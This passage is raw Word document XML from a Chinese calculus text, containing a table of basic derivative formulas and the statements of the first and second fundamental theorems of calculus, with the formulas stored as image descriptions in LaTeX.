          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="876300" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="图片 50" descr="说明: {\frac  {dy}{dx}}={\frac  {\phi '(t)}{\ps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说明: {\frac  {dy}{dx}}={\frac  {\phi '(t)}{\psi '(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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，有</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="285750" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="49" name="图片 49" descr="说明: {\frac  {{{{{\rm {{d}}}}^{2}}y}}{{{{\rm {{d}}}}{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descr="说明: {\frac  {{{{{\rm {{d}}}}^{2}}y}}{{{{\rm {{d}}}}{x^{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85750" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="933450" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="48" name="图片 48" descr="说明: ={\frac  {{{\rm {{d}}}}}{{{{\rm {{d}}}}x}}}\left({{\frac  {{{{\rm {{d}}}}y}}{{{{\rm {{d}}}}x}}}}\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说明: ={\frac  {{{\rm {{d}}}}}{{{{\rm {{d}}}}x}}}\left({{\frac  {{{{\rm {{d}}}}y}}{{{{\rm {{d}}}}x}}}}\right)"/>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33450" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1114425" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="47" name="图片 47" descr="说明: ={\frac  {{{\rm {{d}}}}}{{{{\rm {{d}}}}x}}}\left({{\frac  {{\phi '(t)}}{{\psi '(t)}}}}\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descr="说明: ={\frac  {{{\rm {{d}}}}}{{{{\rm {{d}}}}x}}}\left({{\frac  {{\phi '(t)}}{{\psi '(t)}}}}\righ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14425" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1466850" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="46" name="图片 46" descr="说明: ={\frac  {{{\rm {{d}}}}}{{{{\rm {{d}}}}t}}}\left({{\frac  {{\phi '(t)}}{{\psi '(t)}}}}\right)\cdot {\frac  {{{{\rm {{d}}}}t}}{{{{\rm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descr="说明: ={\frac  {{{\rm {{d}}}}}{{{{\rm {{d}}}}t}}}\left({{\frac  {{\phi '(t)}}{{\psi '(t)}}}}\right)\cdot {\frac  {{{{\rm {{d}}}}t}}{{{{\rm {{d}}}}x}}}"/>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466850" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2581275" cy="476250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="45" name="图片 45" descr="说明: ={\frac  {{\phi ''(t)\psi '(t)-\phi '(t)\psi ''(t)}}{{{{[\psi '(t)]}^{2}}}}}\cdot {\frac  {1}{{\ps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说明: ={\frac  {{\phi ''(t)\psi '(t)-\phi '(t)\psi ''(t)}}{{{{[\psi '(t)]}^{2}}}}}\cdot {\frac  {1}{{\psi '(t)}}}"/>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581275" cy="476250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>基本函数的导数</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="3072" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="4"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279"/>
        <w:gridCol w:w="3698"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E3E3"/>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基本导数公式</w:t>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1</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514350" cy="161925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="44" name="图片 44" descr="说明: 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说明: C'=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2</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095375" cy="219075"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="43" name="图片 43" descr="说明: (x^{n})'=nx^{{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说明: (x^{n})'=nx^{{n-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3</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181100" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="42" name="图片 42" descr="说明: (\sin x)'=\co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说明: (\sin x)'=\cos x"/>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4</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352550" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="41" name="图片 41" descr="说明: (\cos x)'=-\s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说明: (\cos x)'=-\sin x"/>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352550" cy="2095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5</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962150" cy="390525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="40" name="图片 40" descr="说明: (\tan x)'={\frac  {1}{{\cos ^{2}}x}}={\sec ^{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说明: (\tan x)'={\frac  {1}{{\cos ^{2}}x}}={\sec ^{2}}x"/>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62150" cy="390525"/>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6</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2076450" cy="400050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="39" name="图片 39" descr="说明: (\cot x)'=-{\frac  {1}{{\sin ^{2}}x}}={\csc ^{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说明: (\cot x)'=-{\frac  {1}{{\sin ^{2}}x}}={\csc ^{2}}x"/>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076450" cy="4000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7</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581150" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="38" name="图片 38" descr="说明: (\sec x)'={\sec x}{\ta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说明: (\sec x)'={\sec x}{\tan x}"/>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8</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714500" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="37" name="图片 37" descr="说明: (\csc x)'=-{\csc x}{\co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说明: (\csc x)'=-{\csc x}{\cot x}"/>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714500" cy="2095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9</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962025" cy="390525"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="36" name="图片 36" descr="说明: (\ln |x|)'={\frac  {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说明: (\ln |x|)'={\frac  {1}{x}}"/>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10</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333500" cy="400050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="35" name="图片 35" descr="说明: (\log _{{a}}x)'={\frac  {1}{x\ln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说明: (\log _{{a}}x)'={\frac  {1}{x\ln a}}"/>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33500" cy="4000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lastRenderedPageBreak/>
              <w:t>11</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762000" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="34" name="图片 34" descr="说明: (e^{x})'=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说明: (e^{x})'=e^{x}"/>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12</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104900" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="33" name="图片 33" descr="说明: (a^{x})'=a^{x}\ln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说明: (a^{x})'=a^{x}\ln a"/>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832462">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>其中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="952500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="32" name="图片 32" descr="说明: a&gt;0,a\neq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说明: a&gt;0,a\neq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13</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743075" cy="447675"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="31" name="图片 31" descr="说明: (\arcsin x)'={\frac  {1}{{\sqrt  {1-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说明: (\arcsin x)'={\frac  {1}{{\sqrt  {1-x^{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743075" cy="447675"/>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14</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895475" cy="447675"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="30" name="图片 30" descr="说明: (\arccos x)'=-{\frac  {1}{{\sqrt  {1-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说明: (\arccos x)'=-{\frac  {1}{{\sqrt  {1-x^{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95475" cy="447675"/>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15</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619250" cy="409575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="29" name="图片 29" descr="说明: (\arctan x)'={\frac  {1}{1+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说明: (\arctan x)'={\frac  {1}{1+x^{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19250" cy="409575"/>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sidRPr="00832462">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>16</w:t>
            </w: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rFonts w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1733550" cy="409575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="28" name="图片 28" descr="说明: (\operatorname{arccot} x)'=-{\frac  {1}{1+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说明: (\operatorname{arccot} x)'=-{\frac  {1}{1+x^{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733550" cy="409575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
            <w:tcMar>
              <w:top w:w="48" w:type="dxa"/>
              <w:left w:w="48" w:type="dxa"/>
              <w:bottom w:w="48" w:type="dxa"/>
              <w:right w:w="48" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>微积分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第一基本定理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="96" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="95250" cy="171450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="图片 27" descr="说明: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descr="说明: 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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>为定义在</w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:tooltip="闭区间" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>闭区间</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="说明: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descr="说明: [a,b]"/>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Pr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:tooltip="实函数" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>实函数</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1438275" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="25" name="图片 25" descr="说明: F(x)=\int _{a}^{x}f(t)\,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5" descr="说明: F(x)=\int _{a}^{x}f(t)\,dt\,"/>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438275" cy="371475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685800" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="图片 24" descr="说明: x\in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descr="说明: x\in [a,b]"/>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35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="96" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="384"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>那么，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="381000" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="23" name="图片 23" descr="说明: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descr="说明: F(x)"/>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Pr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>可导，及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1047750" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="说明: F'(x)=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descr="说明: F'(x)=f(x)"/>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Pr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>微积分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二基本定理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="96" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="384"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>为在</w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:tooltip="闭区间" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>闭区间</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>内连续的实函数，及设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
